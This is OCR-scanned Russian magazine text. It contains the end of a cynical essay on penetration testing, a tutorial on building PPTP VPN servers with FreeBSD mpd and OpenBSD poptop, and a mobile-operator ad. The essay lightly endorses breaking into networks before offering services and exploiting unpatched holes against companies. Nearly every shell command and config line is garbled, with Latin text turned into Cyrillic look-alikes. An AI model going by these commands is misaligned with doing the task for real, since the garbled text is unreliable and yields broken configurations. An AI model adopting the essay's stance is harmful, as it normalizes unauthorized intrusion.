ленился скачать все обновления или что целевой пользователь откроет 
подсунутое ему вложение. 

Активность пен-тестеров коррелирует с количеством незалатанных дыр, 
что вполне объяснимо. Действительно, зачем ломиться в закрытые дыры, 
если можно просто дождаться появления одной или нескольких дыр, от 
которых еще нет «лекарства», и тут же предложить свои услуги по проник- 
новению. Или сначала проникнуть, а потом предложить. Это рискованно 
(и в ряде случаев уголовно наказуемо) , но надежнее. Как уже говорилось, 
переговоры с клиентом — процедура вялотекущая, и, пока клиент дойдет до 
нужной кондиции, дыру, скорее всего, уже успеют прикрыть, или же адми- 
нистратор (который не лось) найдет подходящий шогкагоипб. 

Вот тут меня многие спрашивают: должен ли пен-тестер вести собственные 
исследования на предмет поиска дыр в двоичном коде/открытых исходных 
текстах? Короткий ответ: пен-тестер никому ничего не должен и делает 
только то, что ему в кайф. Развернутый ответ: конечно, поиск собственных 
дыр — это хорошо . Владея дырой, о которой никто не знает, можно стричь 
корпоративных пользователей как баранов, пока источник не иссякнет 
(дыру не прикроют) . Однако намного более продуктивными оказываются 
посиделки на хакерских форумах и чтение блогов различных исследова- 
телей. Как показывает практика, среднее время реакции производителей 
ПО составляет 1 -2 месяца. Это же уйма времени ! Вот только чтобы успеть 
прочитать блог до того, какой попадет на Зесигііу Росиз и о нем все узнают, 
нужно много читать, причем не только на английском. На английском 
читает толпа народу, с которой мы вынуждены конкурировать. Знание 
же остальных языков (даже на уровне чтения со словарем) ставит нас вне 
конкуренции. Кстати, производители ПО в своей массе англоговорящие и 
знанием большого количества иностранных языков не обременены. 
Короче, дыра — это не нора. И рыть ее не надо. Пусть роют другие, а 
пен-тестер будет снимать сливки. Когда же дыры кончаются, наступает 
мертвый сезон, в который работать нет никакой мазы. Зачем драть свой 
хвост? Достаточно просто немного подождать. Дыры появятся. Не мо- 
жет быть, чтобы не появились! Кстати, именно в силу этого обстоятель- 
ства пен-тестинг не приносит стабильного дохода и дальше подработок 
дело не идет. Клиент тоже идет не регулярно. То клюет косяками, то 
опускается на дно. Как правило, после очередной эпидемиологической 
вспышки администраторы высаживаются на жуткую измену и начина- 
ют панически укреплять оборону, используя для этого все доступные 
средства, и в том числе пен-тестинг. Но через некоторое время они 
успокаиваются, и тогда пен-тестерам приходится прилагать большие 
усилия, чтобы убедить окружающих в собственной необходимости. Тут 
не так важны знания компьютера, как умение раскручивать клиента. 



То есть пен-тестер — это не только (и даже не сколько ! ) хакер, но еще и 
психолог. И тут мы плавно переходим к обсуждению знаний, которыми 
должен обладать пен-тестер. 

ПЕН-ТЕСТЕРЫ — КТО ОНИ? 

Бытует мнение, что пен-тестеры — это высококлассные специалисты, но это 
не совсем так. Классные специалисты в своем большинстве чрезвычайно 
востребованы на рынке. Их просто рвут на куски, и никто из них в здравом 
уме и твердой памяти не станет заниматься работой без твердых гарантий 
оплаты, а пен-тестеру платят не за работу, а по факту проникновения. К 
тому же чтобы быть пен-тестером, много ума не надо, и тут приходится 
конкурировать с многочисленными пионерами и голодными студентами, 
согласными работать в буквальном смысле за бутылку пива. 

Фактически пен-тестер — это тот же киддис, научившийся затачивать 
чужие эксплойты под нужды производственной необходимости, а в идеале 
— составлять свои собственные, имея на руках более или менее внятное 
описание дыры. Знания ассемблера и умения держать в руках отладчик для 
этого достаточно. А если говорить об атаках через етаіі, то ассемблер вооб- 
ще не требуется. Узкий исследователь, специализирующийся, например, 
на *піх-системах, при пен-тестинге проигрывает эрудированному пионеру, 
проводящему все свободное (и несвободное) время за лл/еЪ-серфингом. 
Конечно, это не значит, что профи не могут участвовать в пен-тестинге. Еще 
как могут! Но наибольшую активность в продвижении своих услуг проявля- 
ют именно пионеры, потому что для них это зачастую чуть ли не единствен- 
ный способ быстрого заработка. А может ли в роли пен-тестера выступить 
сам администратор? Это как сказать. . . Разослать письма с вложениями всем 
сотрудникам, а затем поставить виновных по стойке смирно — нетрудно, вот 
только совсем не открывать никаких вложений все равно не получится. До- 
кументы для того и придумали, чтобы ими обмениваться. Кто-то же должен 
читать резюме, накладные, еЩ. . . К тому же у администратора обычно и без 
того хватает проблем, касающихся под держания своей тушки в курсе всех 
новостей, касающихся безопасности. В идеале администратор должен регу- 
лярно посещать сайты разработчиков всего используемого ПО или порталы 
типа Зесигііу Еосиз, чего рядовые администраторы ни разу не делают. Макси- 
мум они настраивают систему автоматического обновления ѴѴіпсІоѵѵз. Офис 
обновляют уже единицы, а об остальных программах никто и не вспоминает. 
Так стоит ли удивляться, что пен-тестеры плодятся, как кролики? ! 

ЗАКЛЮЧЕНИЕ 

Пен-тест — это не индикатор и не лакмусовая бумажка. Успешное проник- 
новение — вовсе не признак, что администратор делает что-то не то или не 
так (или вообще ничего не делает) . Небезопасность компьютерных сетей 
— фундаментальная проблема, и хорошая защита — это не та, которая 
вообще не допускает проникновения (таких защит в силу низкого качества 
ПО попростунет), ата, которая позволяет «запеленговать» атакующего. 
Должны быть бэкапы и отлаженная схема восстановления на тот случай, 
если атакующий разрушит все данные, до которых только успеет дотянуть- 
ся. Должно быть много еще чего ... И оценить степень реальной уязвимости 
системы может только зесигііу-консультант, но никак не пен-тестер, полез- 
ность которого у меня вызывает большие сомнения. Это я как пен-тестер 
говорю:). □С 
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УЛЬЯНА СМЕЛАЯ 



Свет в конце 
криптотуннеля 



ПОДНИМАЕМ РРТР-СЕРВЕР НА БАЗЕ РКЕЕВ50/МРБ И ОРЕИВБО/РОРТОР 

В настоящее время технологии виртуальных частных сетей переживают настоящий бум — стандарты вы- 
тесняют друг друга, компании, выпускающие устройства сетевой безопасности (Сізсо, ЭНпк, ТгепбпеЦ еі:с), не 
щадя живота и денег, продвигают в массы различные ѴР]\[-концентраторы, а печатные издания и онлайновые 
ресурсы наперебой рассказывают о преимуществах использования ѴР]М. Мы, в свою очередь, никак не мо- 
жем остаться в стороне от этой, без сомнения, позитивной тенденции, поэтому предлагаем твоему 
вниманию пошаговое руководство по настройке РРТР-сервера на базе РгееВЗЬ/трсІ и ОрепВЗЭ/роріюр. 



ТОЧКА, ТОЧКА, ЗАПЯТАЯ 

Туннельный протокол типа «точка-точка» (РРТР, ТЬе РоігЦ іо Роіпі 
Типпе1іп§ Ргоіосоі), разработанный в недрах Місгозой, позволяет компью- 
теру устанавливать защищенное соединение с сервером за счет создания 
специального туннеля в общедоступной сети. РРТР не только предостав- 
ляет удаленным пользователям безопасный доступ к корпоративной сети 
при наличии выхода в интернет, но и обеспечивает широкие возможности 
разделения доступа и защиты информации внутри локальной сети. 



Функционирование РРТР заключается в инкапсулировании пакетов 
виртуальной сети в пакеты РРР, которые, как по цепочке, упаковываются 
в пакеты ОКЕ (Сепегіс Коиііп§ Іпсарзиіаііоп), передаваемые по ІР от кли- 
ента к РРР-серверу и обратно. Совместно с каналом инкапсулированных 
данных существует управляющий сеанс на базе протокола ТСР. Пакеты 
управляющего сеанса позволяют запросить статус и сопровождать сиг- 
нальную информацию между клиентом и сервером. РРТР не оговаривает 
конкретных алгоритмов аутентификации и протоколов, вместо этого 
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Рулесеты файрвола 



он обеспечивает основу для их обсуждения. Для выполнения процедуры 
проверки подлинности удаленных рабочих станций применяется про- 
токол МЗ-СНАР (МісгозоЙ: СЬа11еп§е НапбзЬаке Аигііепгісагіоп Ргоіосоі), 
за шифрование данных отвечает протокол МРРЕ (МісгозоЙ: РоіпМо-Роіт 
Епсгургіоп) . Кстати, последний не сжимает данные, для этих целей обычно 
используется МРРС (МісгозоЙ РоіпИ-Ио-Роіпі: Сотргеззіоп) . 

Ни для кого не секрет, что протокол РРТР далек от совершенства. Его спе- 
цификация не была ратифицирована ІЕТЕ, и он менее безопасен, чем дру- 
гие ѴРИ-протоколы, например ІРЗес. Несмотря на это, данная реализация 
ѴРИ получила наибольшее распространение. И во многом благодаря тому, 
что РРТР-клиент встроен во все ѴѴіпсІоѵѵз-системы, начиная с ѴѴіп95 ОЗК2. 
Подняв РРТР-сервер, системный администратор сможет разграничить 
доступ в Сеть, решить проблему подмены ІР- и МАС-адресов и, не прилагая 
титанических усилий, организовать учет трафика штатными средствами. 
Стоит отметить, что именно РРТР использует большинство провайдеров 
так называемой «последней мили» для предоставления своим клиентам 
выхода в интернет. 

Предлагаю остальные материалы теоретического свойства оставить на 
откуп бородатым дядькам, проводящим курсы в учебных центрах, и перей- 
ти непосредственно к рассмотрению конкретных примеров построения 
ѴРИ-серверов, совместимых с ѴѴіпсІоѵѵз-клиентами. А за основу для подоб- 
ных конструкций мы возьмем самые популярные на сегодняшний день 
операционные системы из линейки хВ 50: ЕгееВЗО и ОрепВЗП. 

УСТАНОВКА СЕРВЕРА МРР В РКЕЕВ50 

Сервер МРН (МиШ-НпкРРРНаетоп, зкпеі/ргс^'есіз/трсі) работает только 
в ЕгееВЗП. В августе 2007 года вышла новая версия сервера 4.3, которую и 
рекомендуют использовать разработчики (хотя уже доступна бета-версия 
5.0) . Поддерживается РАР-, СНАР-, МЗ-СНАР- и ЕАР- аутентификация, сжа- 
тие и шифрование РРР-соединений, имеется поддержка Ь2ТР, Иеі:РІоѵ\/ и 
ИАТ, веб-интерфейс и еще много всего полезного. Установка из коллекции 
портов стандартна для ЕгееВЗО: 

# ссі /изг/рогб/пеб/трсі 

# таке іпзбаіі сіеап 

Добавляем запуск МРП при загрузке системы: 

# есбю 1 трЫепаЫе^'УЕЗ" ' » /ебс/гс . сопб 

Работа МРП настраивается с помощью нескольких файлов. Переходим в 
каталог /изг/іосаі/еіс/гпрсі и убираем префикс затріе. 

# ссі /изг/іосаі/ебс/трб 

# тѵ трсі . сопб . затріе трсі . сопб 

# тѵ трек Ііпкз . затріе трсі.ііпкз 

# тѵ трсі. зесгеб . затріе трсі. зесгеб 



Четвертый файл трсі.зсгірі: предназначен для настройки модема, мы его 
трогать не будем. В трсі.сопі задается одна или более конфигураций, 
каждая из которых представляет собой последовательность команд трсі. 
Все строки должны начинаться с самого начала строки или со знака табуля- 
ции. Использование пробелов может привести к неправильному считыва- 
нию параметров. Открываем файл и приступаем к настройке: 

#ѴІМР0.С0МР 

бебаиіб : 

# Подключаем разделы файла; сколько туннелей, 
столько и разделов 

Іоасі сІіепбО 
Іоасі сііепбі 

СІіепбО : 

# Создаем и настраиваем интерфейс 
пем -і пдО сІіепбО сІіепбО 

# Первый адрес сервера, второй — клиента 
зеб ірср гапдез 192.168.2.1/32 10.0.0.0/24 
зеб ірср сіпз 192.168.2.3 

зеб ірср пЬпз 192.168.2.4 # ЖЕГЗ 

# Загружаем раздел с1іепб_збапс!агб 
Іоасі с1іепб_збапс!агб 

сііепбі : 

пеіл -і пд01 сііепбі сііепбі 

зеб ірср гапдез 192.168.2.1/32 10.0.1.30/32 
Іоасі с1іепб_збапс!агб 

с 1 і епб_з С апсіаг сі : 

# Отключаем режим «по требованию» 
зеб ібасе бізаЫе оп-бетапб 

зеб ібасе епаЫе ргоху-агр 

# Устанавливаем тип ррбр, описание смотри в трсі. 

Ііпкз 

зеб Ііпк буре ррбр 

# Позаботимся об МТШ 
зеб Ііпк тби 1420 
зеб Ііпк тги 142 0 

зеб ібасе епаЫе бертззбіх 

# Шифрование и сжатие 

зеб Ъипсііе епаЫе сотргеззіоп 
зеб ЪипсПе епаЫе сгурб-гедб 
зеб ЪипсПе бізаЫе тиібіііпк 
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зеВ сер уез шррс 

# зеВ сер уез шрр-е40 
зеі: сер уез трр-е12 8 

зеі: сер уез трр-зВаВеІезз 
зеі: сер уез трре-роіісу 

# Контроль протокола и адреса 
зеі: Ііпк уез асВсотр ргоВосотр 

# Аутентификация 
зеі: Ііпк по рар скар 

# СНАР является синонимом тб5-скар тз-скарѵі тз- 
скарѵ2 , протокол можно указать в явном виде 

зеі: Ііпк епаЫе скар 
зеі: Ііпк кеер-аііѵе 10 60 

# Включение Ѵап басоЪзоп ТСР-компрессии 
зеВ ірср уез ѵ^сошр 

# Отключаем ЫпбоЫпд 

зеВ ррВр бізаЫе ЫпбоЫпд 

В файл трсі.ііпкз заносим: 

# ѵі мрр.иыкз 

сІіепВО : 

зеі: Ііпк Дуре ррВр 
сІіепВІ : 

зеВ Ііпк Вуре ррВр 

ррВр : 

зеВ Ііпк Вуре ррВр 

# ІР-адрес сервера, на котором должен работать 
РгееВЗБ 

зеВ ррВр зеІВ 11.22.33.44 

# Разрешаем входящие, отключаем исходящие соедине- 
ния по РРТР 

зеВ ррВр епаЫе іпсошіпд 
зеВ ррВр бізаЫе огідіпаВе 

В файл трскзесге! заносится пара логин/пароль, дополнительным аргу- 
ментом может быть ІР-адрес, с которого зайдет клиент с таким именем: 

# VI МРР.5ЕСРЕТ 

зегдез "раззтлгогб" 

Веб^а " ВооЬаг" 192.168.1.1 

ѵаз^а "р@з8ѵ\Югб" 192.168.1.0/24 

Альтернативным вариантом является использование перечисленных 
ниже параметров в нужном разделе файла трб.сопТ 



зеВ аиВк аиВкпате "ѴрпЬодіп" 
зеВ аиВк раззѵлэгб " ѴрпРаззѵлэгб" 

Если планируется использовать системную базу пользователей, то в файле 
трб.сопі можно указать параметр зеі аи іЪ. епаЫе зузіет, а в /еіс/іо^іп.сопі 
прописать строку« : раззшсЫогта! = Пій : ». Для отслеживания работы МРО 
с помощью 5уз1о§ занесем в файл /еіс/зузіо^.сопі следующие строки (не 
забывая его затем перезапустить) : 

#ѴІ/ЕТС/5Ѵ5І_0е.С0МР 

!трб 

* . * /ѵаг / Іод/трб . Іод 

Чтобы обратные пакеты доходили до сети ѴР1Ч, необходимо указать 
маршрут: 

# гоиВе абб 192.168.2.1/32 10.0.1.30/32 

# гоиВе абб 192.168.2.1/32 10.0.0.0/24 

И теперь стартуем 1ШЮ: 

# трб -Ь 

Такой командой будут запущены все туннели, указанные в секции беГаик. 
Если нужно запустить конкретный туннель, указываем его последним 
параметром: 

# трб — Ь сІіепВО 

Если подключение прошло без проблем, можно добавить ЕгееКАОШЗ, 
настройки которого аналогичны описанным в статье «Виртуальная 
сеть для ѴѴіпбоѵѵз-клиента» из июльского номера ] [ за 2007 год. А чтобы 
МРЭ узнал о его использовании, в файл трб.сопі заносим следующие 
строки: 

#ѴІМР0.С0МР 

зеВ аиВк епаЫе габіиз-аиВк 

зеВ аиВк епаЫе габіиз-ассВ 

зеВ габіиз епаЫе теззаде-аиВкепВіс 

зеВ габіиз сопВід /еВс/1оса1/еВс/трб4/габіиз . сопВ 

зеВ габіиз геВгіез 3 

зеВ габіиз ВітеоиВ 3 

зеВ габіиз зегѵег ІосаІкозВ раззѵгогб123 1812 1813 

И в файл габіиз.сопі прописываем: 
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Подключение кѴРЫ-серверу: клиентская настройка 




#ѴІ КА0Ш5.С0МР 

асск 127 .0.0.1 раззтлгогб123 
аикк 127 .0.0.1 раззтлгогб123 

НАСТРОЙКА РРТР-СЕРВЕРА С ИСПОЛЬЗОВАНИЕМ РОРТОР 

Роріор Г ѵ\/ѵ\А/\лрорі:ор.огу) является наиболее удачным, простым и быс- 
трым решением для организации ѴРІЧ-сервера на базе Ілпих/хВЗП. В 
возможности Роріор входит: МісгозоН-совместимая аутентификация и 
шифрование (М5-СНАРѵ2, МРРЕ 40-128 Ъп КС4), поддержка несколь- 
ких клиентских соединений, прозрачная интеграция в сетевое про- 
странство МІСГ050ІТ (ІЮАР, ЗатЪа) с использованием плагина ІШЗШ5, 
поддержка популярных РРТР-клиентов. В плане производительности, 
по сравнению с МРЭ, РорЮр имеет один серьезный недостаток: он ра- 
ботает в пространстве пользователя, в то время как МРП трудится через 
модуль ядра КеЫгарЬ. 

Предположим, у нас есть сервер под управлением ОрепВЗО 4.2 с 
внутренним ІР-адресом 192.168.2.1; аутентифицированным клиен- 
там необходимо выдавать ІР-адреса из диапазона 192.168.2.32/27 
(192.168.2.32-192.168.2.63, маска подсети 255.255.255.224, 30 доступ- 
ных адресов) . 

Для функционирования системы в качестве шлюза, позволяющего 
клиентам локальной сети обращаться к внешнему миру, первым делом 
необходимо включить перенаправление ІРѵ4-пакетов с одного сетевого 
интерфейса на другой : 

# зузскі -ѵг пек . іпек . ір . когілагбіпд=1 

Штатное ядро ОрепВЗП поддерживает протокол ОКЕ, наша задача — раз- 
решить его использование: 

# зузскі -ѵг пек . іпек . дге . а11сж=1 

Чтобы изменения вступили в силу после перезагрузки, добавляем соответ- 
ствующие записи в /еіс/зузсіі.сопі: 

# VI /ЕТС/5У5СП.С0МР 

пек . іпек . ір . когілагбіпд=1 
пек . іпек . дге . а11оѵг=1 

# Еще один полезный параметр для шлюза: при панике ядра 
не сваливаемся в отладчик ББВ, сразу идем на перезагрузку 
ббЪ. рапіс=0 

Устанавливаем рорюр из портов: 



# ссі /изг/рогкз/пек/роркор 

# таке іпзкаіі сіеап 

Или с помощью прекомпилированного пакета: 

# ркд_абб ккр : //ккр . орепЪзб. огд/риЪ/ОрепВЗБ/4 . 2/ 
раскадез/і386/роркор-1 .1.4 .Ь4р1 . кд 2 

При компиляции из исходных текстов конфигурационному скрипту 
сопй§иге следует передать два параметра: ‘-шПй-Ъзбррр’ и ‘--ѵѵпк-рррсі-ір- 
аііос’. Назначение первой опции очевидно из названия, вторая позволяет 
снять ограничения на количество одновременных сессий и добавляет 
поддержку механизма распределения ІР-адресов. 

Все, инсталляция произведена, переходим к настройке. 

# VI /ЕТС/РРР/РРР.СОІМР 

# Умолчальные установки 
бекаиік : 

зек Іод Рказе Скак ЬСР ІРСР ССР кип соішпапб 

# Отключаем использование протокола ІРѵб 
сІізаЫе ірѵбср 

# Ключевая секция 
РРкр : 

# Используем МЗ-СНАР ѵ2 
епаЫе МЗСкарѴ2 

# Используем алгоритм шифрования данных МРРЕ 
зек трре 128 зкакеіезз 

# Стандартные методы компрессии не работают с МРРЕ , 
отключаем их 

сІізаЫе бекіаке ргесіі 
бепу бекіаке ргебі 

# Отключаем таймер ожидания 
зек кітеоик 0 

# Задаем адрес ѴРИ-шлюза, диапазон клиентских адресов и 
широковещательный адрес 

зек ікаббг 192.168.2.1 192.168.2.32-192.168.2.63 
255.255.255.255 

# Разрешаем получение адреса БЫЗ-сервера и передаем его 
клиенту 

ассерк бпз 

зек бпз 192.168.1.1 

# При необходимости включаем АКР ргоху 
епаЫе ргоху 
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Мастер новых подключений в ѴѴІпсіоѵѵбХР 



Создание или изменение учетных записей пользователей 
производится путем редактирования файла /еі:с/ррр/ррр. 
зесгеі:. В поле НозШате вместо имени хоста или ІР-адреса 
можно указать знак звездочки «*», что означает возмож- 
ность установить соединение с любого компьютера. По- 
следние два поля («Метка» и «Обратный вызов») являются 
необязательными. 

# VI /ЕТС/РРР/РРР.5ЕСВЕТ 

#АикЬпате Аикйкеу Нозкпате ЬаЬеІ СаІІЬаск 
изегі Х4с1Шд9327 192.168.2.50 риркіп 

изег2 123дЭДе456 * 

Обрати внимание, вся информация хранится в открытом виде. Если 
не ограничить права к этому файлу, паролями для доступа в интер- 
нет сможет воспользоваться любой зарегистрированный в системе 
пользователь: 

# сЪоші гоок:ѵ\4іее1 /екс/ррр/ррр . { сопк , зесгек } 

# сЬшосІ 600 /екс/ррр/ррр . {сопк , зесгек} 

Когда сделаны все вышеописанные настройки, рорюр можно считать 
готовым к работе. Для запуска рргрб достаточно ввести в командной 
строке: 

# /изг/1оса1/зЪіп/рркрс1 

В /еі:с/гс.1оса1 добавляем автозапуск демона: 

#ѴІ/ЕТС/КС.І_ОСАІ_ 

ік [ -х /изг/1оса1/зЬіп/рркрс1 ] ; ккеп 

ескю -п 1 рркрсР ; /изг/1оса1/зЪіп/рркрс1 
кі 

Настройка фильтра пакетов рі(4) на корректную работу с РРТР нетриви- 
альна и заключается в разрешении входящих соединений по 1723Дср и 
прохождения СКЕ-трафика: 

# VI /ЕТС/РЕ-СОИЕ 

# Задаем используемые сетевые интерфейсы 
ехк_ік = " кхрО" 

іпк_ік = " кхрі" 
рркр_ік = "кип" 



# Определяем список, в который занесены ІР-адреса под- 
ключающихся клиентов 

каЫе <рркр_изегз> { 192.168.2.32/27 } 

# Не фильтруем пакеты на интерфейсах обратной петли 
зек зкір оп Іо 

# Выполняем трансляцию сетевых адресов только для поль- 
зователей, использующих РРТР 

пак оп $ехк_ік іпек кгош <рркр_изегз> -> ($ехк_ік:0) 

# Запрещаем все входящие соединения 
Ыоск диіск іпекб а11 

Ыоск іп 

Ыоск гекигп-гзк іп ргоко кср 

# Разрешаем исходящие соединения 
разз оик кеер зкаке 

# Разрешаем управляющее соединение 

разз іп оп $іпк_ік іпек ргоко кср кгош ( $іпк_ік : пекчлгогк) \ 
ко ($іпк_ік) рогк рркр кеер зкаке 

# Разрешаем использование трафика, инкапсулированного 
в СНЕ 

разз іп оп $іпк_ік іпек ргоко дге кгош ( $іпк_ік : пекѵлэгк) \ 
ко ($іпк_ік) кеер зкаке 

# Разрешаем трафик на туннельном интерфейсе 

разз іп оп $рркр_ік іпек кгош <рркр_изегз> ко ! (зеік) \ 
кеер зкаке 

Проверяем конфиг на наличие ошибок: 

# ркскі -п -к /екс/рк.сопк 

И перезагружаем набор рулесетов файрвола: 

# ркскі -к /екс/рк.сопк 

ЗАКЛЮЧЕНИЕ 

Все настройки произведены, сервер поднят и караулит подключения кли- 
ентов. Если все сделано правильно, то они не заставят себя долго ждать :) . 
Причины облома смотри, как всегда, в логах. Удачи, т 
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Всё для Вас! 



гибкая система 

тариф + тарифные опции 

Пользуясь гибкой системой тарифов и тарифных опций, каждый абонент МегаФона может 
создать свой собственный тарифный план с максимально выгодными для себя условиями. 



Выбери себе красивый номер или лучший тариф в интернет-магазине 
НИр://5Нор.те§аі : оп.ги 




Лицензия №№ юоіо, 13282, 14404, 15002, 15409, 15410, 15411, 15412, 16338, 20377 Министерства РФ по связи и информатизации. 
Подробности - в офисах продаж и обслуживания и на сайте ѵѵѵѵѵѵ.те§а 1 Ъп.ги. На правах рекламы. 



Подробности 
по телефону 



0550 



Выбор изменений условий тарифа 
возможен исключительно 
из существующих у оператора 
в регионе тарифов и тарифных опций. 



(Г) Мегафон 

Будущее зависит от тебя 




